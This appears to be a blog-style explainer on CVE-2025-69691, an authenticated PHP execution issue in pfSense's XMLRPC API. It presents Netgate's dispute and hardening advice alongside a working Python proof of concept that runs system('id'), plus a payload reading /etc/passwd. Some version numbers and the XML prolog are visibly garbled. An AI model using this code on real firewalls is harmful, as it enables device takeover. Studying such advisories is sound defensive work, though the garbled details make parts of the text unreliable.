CVE-2025-69691 - Remote Code Execution in Netgate pfSense CE 2.8. XMLRPC API (pfsense.exec_php) — Explained

Netgate’s pfSense is a popular open-source firewall and router. In version 2.8., a new security concern—CVE-2025-69691—has been identified that lets an authenticated admin execute arbitrary PHP code using the pfsense.exec_php method in the XMLRPC API.

Some say this isn’t a vulnerability, because you already need admin-level access to use the API call (and admins can do anything). Still, understanding this behavior is important for everyone securing or deploying pfSense.

What Is CVE-2025-69691?

Summary:
In pfSense CE 2.8., the xmlrpc.php API endpoint exposes the pfsense.exec_php method. If a user with administrator credentials calls this method, they can remotely send and execute any PHP code on the pfSense device.

Is it a big deal?
- If an attacker steals admin credentials or if you mistakenly give API access to an untrusted user, they can gain full control over your firewall.
- However, the pfSense supplier (Netgate) disputes this as a “vulnerability” because the action is deliberate and only allowed for fully trusted users.

Where Does It Happen? The XMLRPC API

The file involved is typically /xmlrpc.php.
The method that leads to code execution is called pfsense.exec_php.

If you call this method over the API and are authenticated as admin, pfSense will literally execute and return the result of your PHP code.

Here’s how an API call to pfsense.exec_php might look using Python and the requests library

import requests
from requests.auth import HTTPBasicAuth

# Target pfSense device
url = "https://your-pfsense.example.com/xmlrpc.php";

# The PHP code you want to execute
php_code = "echo system('id');"

# XMLRPC payload
xml = f'''
<?xml version="1."?>
<methodCall>
  <methodName>pfsense.exec_php</methodName>
  <params>
    <param>
      <value><string>{php_code}</string></value>
    </param>
  </params>
</methodCall>
'''

headers = {'Content-Type': 'text/xml'}

# Authenticated admin credentials
username = "admin"
password = "your_admin_password"

response = requests.post(
    url,
    data=xml.strip(),
    headers=headers,
    auth=HTTPBasicAuth(username, password),
    verify=False  # Only for testing; don't use in production
)

print(response.text)

This snippet, when run with valid admin credentials, returns the output of system('id') from the firewall. You could swap "id" for any other OS command.

Real-World Risk

- Who is vulnerable? Only pfSense devices where an attacker can use the XMLRPC API with admin credentials.
- Is this a remote bug? Yes, if someone with admin credentials accesses the API, or if you have weak credentials or an exposed API, you are at risk.
- Can a regular user exploit it? No. Only users with full admin rights to the pfSense device via XMLRPC.

pfsense.exec_php

echo shell_exec('cat /etc/passwd');

`

If admin credentials are correct, the API returns the contents of /etc/passwd.

Netgate says

> This is not a vulnerability. The XMLRPC API pfsense.exec_php call is only accessible to authenticated admins, and admins are intentionally allowed to execute PHP code on pfSense systems.

In summary: If someone already has admin access, they can always run code—so this API call doesn’t give them anything extra.

Closing Advice

- Protect admin API access. Only trusted users should have admin credentials. Don’t expose the XMLRPC API to the open internet.

Limit API permissions. If possible, don’t give API access to users who don’t need it.

## References / Further Reading

- pfSense XMLRPC API Reference
- CVE-2025-69691 Entry (mitre.org) *(placeholder until public release)*
- Netgate Security Advisories

Should you worry? Only if your admin credentials or API exposure are not secure.

Bottom line: Don’t expose pfSense admin or its API, and only serious admins should have access.

---

Timeline

Published on: 05/08/2026 00:00:00 UTC
Last modified on: 05/08/2026 05:51:51 UTC